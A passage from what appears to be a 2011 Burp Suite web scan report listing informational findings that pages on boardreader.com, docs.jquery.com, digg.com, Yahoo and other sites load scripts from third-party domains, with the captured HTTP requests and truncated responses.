HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.37. http://boardreader.com/pop/news/-/-/3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/news/-/-/3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/news/-/-/3.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.38. http://boardreader.com/pop/projects.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/projects.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/projects.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:55 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.39. http://boardreader.com/pop/releases/-/-/3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/releases/-/-/3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/releases/-/-/3.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.40. http://boardreader.com/pop/sites.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/sites.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/sites.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:40 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.41. http://boardreader.com/pop/topics.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/topics.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/topics.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.42. http://boardreader.com/pop/videos/-/-/3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/videos/-/-/3.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pop/videos/-/-/3.html HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

19.43. http://cherne.net/brian/resources/jquery.hoverIntent.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cherne.net
Path:   /brian/resources/jquery.hoverIntent.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /brian/resources/jquery.hoverIntent.html HTTP/1.1
Host: cherne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:04:02 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 02:34:12 GMT
ETag: "583c1ea-2ab4-486485c59d100"
Accept-Ranges: bytes
Content-Length: 10932
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-Type" cont
...[SNIP]...
<!-- close #pageContent -->

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

19.44. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta n
...[SNIP]...
</script>
-->
<script type="text/javascript" src="//www.google.com/jsapi?key=ABQIAAAADt6BAnD8dtel7ntjLPvCuhQzG-EGDF6M_DW9NZrYgzPLAWeW3RSMGuC347e2oypc5xlBLRH7xra_HA">
</script>
...[SNIP]...

19.45. http://code.google.com/p/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:04:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a5a07ae786cc1296:TM=1296770658:LM=1296770658:S=yVxBuI2w2sM7RSeS; expires=Sat, 02-Feb-2013 22:04:18 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

19.46. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:08 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cb6b836b6760c3ac:TM=1296765128:LM=1296765128:S=HgS2nFLrqCV4X1Jh; expires=Sat, 02-Feb-2013 20:32:08 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...
</table>
<script src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/prettify.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.gstatic.com/codesite/ph/3799605220899551948/js/core_scripts_20081103.js"></script>
...[SNIP]...

19.47. http://core.videoegg.com/eap/12368/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/12368/html/jstags.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "eae304da32ffc83f8aac123834882aa2:1292880706"
Last-Modified: Mon, 20 Dec 2010 21:16:26 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public
Content-Length: 1060

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.48. http://dean.edwards.name/weblog/2006/03/base/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /weblog/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:54 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Thu, 03 Feb 2011 19:48:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176038

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<link rel="icon" href="/favicon.ico" type="image/x-icon">
<script src="http://deanedwardsoffline.appspot.com/js/my.js"></script>
...[SNIP]...

19.49. http://developer.yahoo.com/yui/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /yui/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:44 GMT
Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...
</div>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yahoo-dom-event/yahoo-dom-event.js&2.5.2/build/container/container-min.js&2.5.2/build/menu/menu-min.js&2.5.2/build/element/element-beta-min.js&2.5.2/build/button/button-min.js&3.2.0/build/yui/yui-min.js"></script>
<!-- JS -->
<script type="text/javascript" src="http://l.yimg.com/a/combo?ydn/site/ydn-105031.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</html>


<script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

19.50. http://developer.yahoo.com/yui/license.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.com
Path:   /yui/license.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /yui/license.html HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:04:29 GMT
Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 22172

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="descr
...[SNIP]...
</div>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yahoo-dom-event/yahoo-dom-event.js&2.5.2/build/container/container-min.js&2.5.2/build/menu/menu-min.js&2.5.2/build/element/element-beta-min.js&2.5.2/build/button/button-min.js&3.2.0/build/yui/yui-min.js"></script>
<!-- JS -->
<script type="text/javascript" src="http://l.yimg.com/a/combo?ydn/site/ydn-105031.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</html>


<script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

19.51. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 22:06:01 GMT; path=/; domain=digg.com
Set-Cookie: d=54e4a28f852dd9430bb81e5749041f841a02a7d84540fb9d52a4a7781b876e52; expires=Wed, 03-Feb-2021 08:13:41 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28261 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3360

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...
</div>


<script src="http://cdn1.diggstatic.com/js/m/lib.b2eeaa6c.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

19.52. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=0ff09a9ff26d23c27385462bc99e308f35991a0289651f6a22602a6a428198db; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21532 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn3.diggstatic.com/js/lib.56731306.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

19.53. http://docs.jquery.com/Favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /Favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: docs.jquery.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:30:31 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.54. http://docs.jquery.com/UI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:44 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.55. http://docs.jquery.com/UI/Accordion  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:45 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.56. http://docs.jquery.com/UI/Autocomplete  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Autocomplete

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Autocomplete HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:01 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.57. http://docs.jquery.com/UI/Button  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.jquery.com
Path:   /UI/Button

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /UI/Button HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

